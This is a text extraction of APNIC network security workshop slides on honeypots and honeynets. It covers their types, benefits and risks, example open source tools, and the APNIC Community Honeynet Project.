1

Issue Date:

Revision:

Honeypots & Honeynets

Network Security Workshop

30 May 2015

2.0-draft

22

Contents

1. Objectives

2. Definition of Honeypot & Honeynets

3. Benefits & Risk consideration

4. Example of Honeypot tools

5. The Honeynet Project

Credits: David Watson (Honeynet Project) for the some of the contents of this slide david@honeynet.org.uk

33

Know Your Enemy

(Mission Statement, The Honeynet Project)

These days you may be familiar with the term ‘Threat

Intelligence’

To learn the tools, tactics and motives involved in

computer and network attacks, and share the lessons

learned

44

Honeypots in a Nutshell

• Resources (vulnerable) deployed to– Learn about attacks and attackers methodology

• Understand how systems are compromised

• Uncover the attacker’s infrastructure (compromised hosts, networks, C&C servers)

– Capture relevant artifacts – pcaps, malware samples, etc• Could even show vulnerabilities not yet known!

• Lots of open source tools and projects

• Nothing to do with bees or honey ☺

55

The Big Picture

Attacking

Host

[IP Address]

HoneypotPastebin

• Attacking host - bruteforce and gain access

• Downloads malicious script

• Executes malicious script– Honeypot won’t execute the script but we have a

copy of the malware sample• What is the malware doing?

66

Honeypots and Honeynets

• A honeypot is an information system resource whose value

lies in the unauthorized or illicit use of that resource

• Honeypot systems have no production value, so any

activity going to or from a honeypot is likely a probe, attack

or compromise

• A honeynet is simply a network of honeypots

• Information gathering and early warning are the primary

benefits to most organisations

77

Honeypot and Honeynet Types

• Low-Interaction (LI)

– Emulates services, applications and OS’s

– Easier to deploy/maintain, low risk, but only limited information

• High-Interaction (HI)

– Real services, applications and OS’s

– Capture extensive information, but higher risk and time intensive to

maintain

88

Honeypot and Honeynet Types

• Server Honeypots

– Listen for incoming network connections

– Analyse attacks targeting host’s users, services and operating

systems

• Client Honeypots

– Reach out and interact with remote potentially malicious resources

– Have to be instructed where to go to find evil

– Analyse attacks targeting clients and users

9

Honeypot and Honeynet Pros / ConsPros

• Simple Concept

• Collect small data sets of high value

• Few False Positives

• Catch new attacks

• Low False Negatives

• Can beat encryption

• Minimal hardware

• Real time alerting

Cons

• Potentially complex

• Need data analysis

• Only a microscope

• Detection by attackers

• Risk from compromises

• Legal concerns

• False negatives

• Potentially live 24/7

• Operationally intensive

10

APNIC46• APNIC46 Network Security

Workshop Participants deployed 7 honeypots to a cloud service

1111

APNIC46

1212

APNIC46

1313

What can you learn?• Hosts that are trying to connect / scan you

– Potentially already compromised or infected

– such as IP address

• The payload used after successfully gaining access to the honeypot system

• Scripts, binaries/executables etc. – remote control scripts

– malware samples

1414

Why would you want to do this? • By right, you should not expect any real activity or traffic

to/from/in your honeypot

• Detect anomalous activities in your network or system? – Infected / Compromised computers

– Misconfiguration

• Learn about attacks in the wild (research) – Especially if you can scale the deployment

– Attackers and attacker techniques

– Information Sharing opportunities

– Improve overall Security

1515

Some Examples

• Dionaea (Malware) ：http://dionaea.carnivore.it/

• Cowrie - SSH & Telnet honeypot : https://github.com/cowrie/cowrie/

• Kippo - SSH honeypot ：https://code.google.com/p/kippo/

• Glastopf – Web Honeypot : http://glastopf.org/

• Ghost – USB Honeypot

– https://code.google.com/p/ghost-usb-honeypot/

• Thug – Client Honeypot : https://github.com/buffer/thug

16

APNIC Community Honeynet Project

17

APNIC Community Honeynet Project

• Started in 2015

• Distributed Honeypots*

• Partners mainly in the AP region

• Observe and learn about attacks on the Internet

• Information sharing with APNIC members, CERTs/CSIRTs and Security Community

1818

Learn from actual compromise

• Honeypot used – Cowrie

• Emulate login on port 22 (ssh) and port 23 (telnet)

• Present attacker with file system

• Capture commands and allow attacker to download scripts/binaries (payload)

• Demo:– https://www.fsck.my/viz/kippo-playlog.php

– Check out #2 (manual attack) and #19 (automated attack)

1919

APNIC Community HP

2020

Sensor locations• Tonga

• Samoa

• Malaysia

• Bhutan

• Bangladesh

• Japan

• Australia

2121

Conclusion

• Honeypots are useful for learning about attacks (early warning or research)

• APNIC Community Project– Looking for partners to deploy honeypots

– Collaboration

Contact: adli@apnic.net